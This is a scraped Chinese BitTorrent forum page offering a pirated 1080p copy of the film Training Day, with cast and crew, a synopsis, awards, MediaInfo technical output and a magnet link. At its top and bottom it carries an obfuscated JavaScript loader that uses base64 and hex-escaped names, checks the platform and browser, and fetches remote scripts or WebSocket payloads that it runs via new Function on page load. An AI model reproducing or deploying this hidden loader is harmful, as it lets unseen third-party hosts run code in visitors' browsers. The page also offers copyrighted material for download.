训练日[中文字幕].Training.Day.2001.1080p.BluRay.x265.10bit.DD.5.1 4.83GB

版主小s 28天前 192

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 训练日 / 边缘特训(港) / 震撼教育(台)

◎片 名 Training Day

◎年 代 2001

◎产 地 美国

◎类 别 剧情 / 惊悚 / 犯罪

◎语 言 英语 / 俄语 / 西班牙语 / 韩语 / 希腊语

◎上映日期 2001-10-05(美国)

◎IMDb链接 https://www.imdb.com/title/tt0139654/

◎豆瓣评分 8.0/10 (74793人评价)

◎豆瓣链接 https://movie.douban.com/subject/1304898/

◎片 长 122分钟

◎导 演 安东尼·福奎阿 Antoine Fuqua (id:1013907)

◎编 剧 大卫·阿耶 David Ayer (id:1319045)

◎演 员 丹泽尔·华盛顿 Denzel Washington (id:1054431)

伊桑·霍克 Ethan Hawke (id:1018984)

斯科特·格伦 Scott Glenn (id:1007019)

汤姆·贝伦杰 Tom Berenger (id:1019024)

哈里斯·于林 Harris Yulin (id:1160840)

雷蒙德·J·巴里 Raymond J. Barry (id:1032043)

克利夫·柯蒂斯 Cliff Curtis (id:1022578)

德瑞博士 Dr. Dre (id:1004884)

史努比狗狗 Snoop Dogg (id:1027838)

玛西·格雷 Macy Gray (id:1049973)

夏洛特·阿雅娜 Charlotte Ayanna (id:1027351)

伊娃·门德斯 Eva Mendes (id:1041015)

尼克·齐兰德 Nick Chinlund (id:1040642)

Jaime Gomez Jaime Gomez (id:1054575)

雷蒙德·克鲁斯 Raymond Cruz (id:1076277)

诺尔·古格雷米 Noel Gugliemi (id:1319474)

Samantha Esteban Samantha Esteban (id:1067329)

弗兰·克朗茨 Fran Kranz (id:1113019)

萨拉·丹尼尔·马迪森 Sarah Danielle Madison (id:1124630)

威尔·斯图尔特 Will Stewart (id:1022658)

丹泽尔·惠特克 Denzel Whitaker (id:1018096)

大卫·阿耶 David Ayer (id:1319045)

泰瑞·克鲁斯 Terry Crews (id:1022577)

彼得·格林纳 Peter Greene (id:1027274)

娜姆拉塔辛格古吉尔 Namrata Singh Gujral (id:1179162)

Gary Rodriguez Gary Rodriguez (id:1145032)

大卫·阿耶 David Ayer (id:1319045)

摩洛·斐欧拉 Mauro Fiore (id:1283756)

◎标 签 犯罪 / 美国 / 人性 / 剧情 / 动作 / 警匪 / 黑帮 / 暴力

◎简 介

阿洛佐(丹泽尔?华盛顿 Denzel Washington饰)是美国毒品缉查部的黑人警探,经验丰富,查案出色,对毒品案件有着敏锐的嗅觉。人称“魔幻之眼”。这天阿洛佐的部门来了一个新同事杰克(伊桑?霍克 Ethan Hawke 饰),杰克跟随阿洛佐深入到街头的每一个阴暗角落,发现这个城市光怪陆离的同时,也慢慢见识了阿洛佐亦正亦邪的办案手法。

阿洛佐虽然身为警探,手段却游走在法律边缘。他秉持“以毒攻毒”的原则,先把自己武装起来:没收罪犯的毒品自己服下,用枪指着杰克命令他跟着照做,他与贩毒分子甚至有着某种不寻常关系。但另一方面,他却奋力保护杰克这个年轻人,复杂的性格让杰克对这个神探上司捉摸不透。

◎获奖情况 (共3项)

第74届奥斯卡金像奖 (2002)

最佳男主角

└──丹泽尔·华盛顿 (id:1054431)

最佳男配角(提名)

└──伊桑·霍克 (id:1018984)

第59届金球奖 (2002)

电影类 剧情片最佳男主角(提名)

└──丹泽尔·华盛顿 (id:1054431)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 328268396444528220327535798612774362330 (0xF6F63185FEB0FC40A31E749773CC1CDA)

  4. Complete name : [email protected]M.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 4.83 GiB

  8. Duration : 2 h 2 min

  9. Overall bit rate : 5 670 kb/s

  10. Encoded date : UTC 2021-11-02 13:34:32

  11. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 2 h 2 min

  20. Bit rate : 4 957 kb/s

  21. Width : 1 916 pixels

  22. Height : 810 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.133

  30. Stream size : 4.23 GiB (87%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=17.0000 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1916x810 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. ID in the original source medium : 4352 (0x1100)

  38. Format : AC-3

  39. Format/Info : Audio Coding 3

  40. Commercial name : Dolby Digital

  41. Codec ID : A_AC3

  42. Duration : 2 h 2 min

  43. Bit rate mode : Constant

  44. Bit rate : 640 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : L R C LFE Ls Rs

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 31.250 FPS (1536 SPF)

  49. Compression mode : Lossy

  50. Stream size : 559 MiB (11%)

  51. Language : English

  52. Service kind : Complete Main

  53. Default : Yes

  54. Forced : No

  55. Original source medium : Blu-ray


  56. Text #1

  57. ID : 3

  58. ID in the original source medium : 4613 (0x1205)

  59. Format : PGS

  60. Muxing mode : zlib

  61. Codec ID : S_HDMV/PGS

  62. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration : 1 h 54 min

  64. Bit rate : 40.3 kb/s

  65. Count of elements : 3054

  66. Stream size : 32.9 MiB (1%)

  67. Title : chs&eng

  68. Language : Chinese

  69. Default : Yes

  70. Forced : No

  71. Original source medium : Blu-ray


  72. Text #2

  73. ID : 4

  74. ID in the original source medium : 4614 (0x1206)

  75. Format : PGS

  76. Muxing mode : zlib

  77. Codec ID : S_HDMV/PGS

  78. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration : 1 h 54 min

  80. Bit rate : 40.6 kb/s

  81. Count of elements : 3054

  82. Stream size : 33.2 MiB (1%)

  83. Title : cht&eng

  84. Language : Chinese

  85. Default : No

  86. Forced : No

  87. Original source medium : Blu-ray


  88. Text #3

  89. ID : 5

  90. ID in the original source medium : 4615 (0x1207)

  91. Format : PGS

  92. Muxing mode : zlib

  93. Codec ID : S_HDMV/PGS

  94. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  95. Duration : 1 h 54 min

  96. Bit rate : 21.2 kb/s

  97. Count of elements : 3054

  98. Stream size : 17.4 MiB (0%)

  99. Title : chs

  100. Language : Chinese

  101. Default : No

  102. Forced : No

  103. Original source medium : Blu-ray


  104. Text #4

  105. ID : 6

  106. ID in the original source medium : 4616 (0x1208)

  107. Format : PGS

  108. Muxing mode : zlib

  109. Codec ID : S_HDMV/PGS

  110. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  111. Duration : 1 h 54 min

  112. Bit rate : 21.5 kb/s

  113. Count of elements : 3054

  114. Stream size : 17.6 MiB (0%)

  115. Title : cht

  116. Language : Chinese

  117. Default : No

  118. Forced : No

  119. Original source medium : Blu-ray


  120. Text #5

  121. ID : 7

  122. ID in the original source medium : 4609 (0x1201)

  123. Format : PGS

  124. Muxing mode : zlib

  125. Codec ID : S_HDMV/PGS

  126. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  127. Duration : 2 h 0 min

  128. Bit rate : 49.9 kb/s

  129. Count of elements : 2842

  130. Stream size : 43.2 MiB (1%)

  131. Title : eng

  132. Language : English

  133. Default : No

  134. Forced : No

  135. Original source medium : Blu-ray


  136. Menu

  137. 00:00:00.000 : en:Chapter 01

  138. 00:03:53.524 : en:Chapter 02

  139. 00:08:02.356 : en:Chapter 03

  140. 00:12:20.072 : en:Chapter 04

  141. 00:15:37.394 : en:Chapter 05

  142. 00:20:35.943 : en:Chapter 06

  143. 00:25:42.290 : en:Chapter 07

  144. 00:32:13.932 : en:Chapter 08

  145. 00:36:12.670 : en:Chapter 09

  146. 00:40:41.063 : en:Chapter 10

  147. 00:45:20.467 : en:Chapter 11

  148. 00:47:15.207 : en:Chapter 12

  149. 00:49:24.002 : en:Chapter 13

  150. 00:55:04.259 : en:Chapter 14

  151. 00:59:59.762 : en:Chapter 15

  152. 01:02:56.272 : en:Chapter 16

  153. 01:09:56.859 : en:Chapter 17

  154. 01:15:08.253 : en:Chapter 18

  155. 01:20:29.699 : en:Chapter 19

  156. 01:24:17.385 : en:Chapter 20

  157. 01:29:26.277 : en:Chapter 21

  158. 01:33:27.602 : en:Chapter 22

  159. 01:37:21.335 : en:Chapter 23

  160. 01:41:25.579 : en:Chapter 24

  161. 01:45:00.210 : en:Chapter 25

  162. 01:48:44.184 : en:Chapter 26

  163. 01:52:39.961 : en:Chapter 27

  164. 01:55:43.144 : en:Chapter 28




复制代码


TAGS 剧情 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:B8425FB1A747F842486F906CCC054DC70B2652C3

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};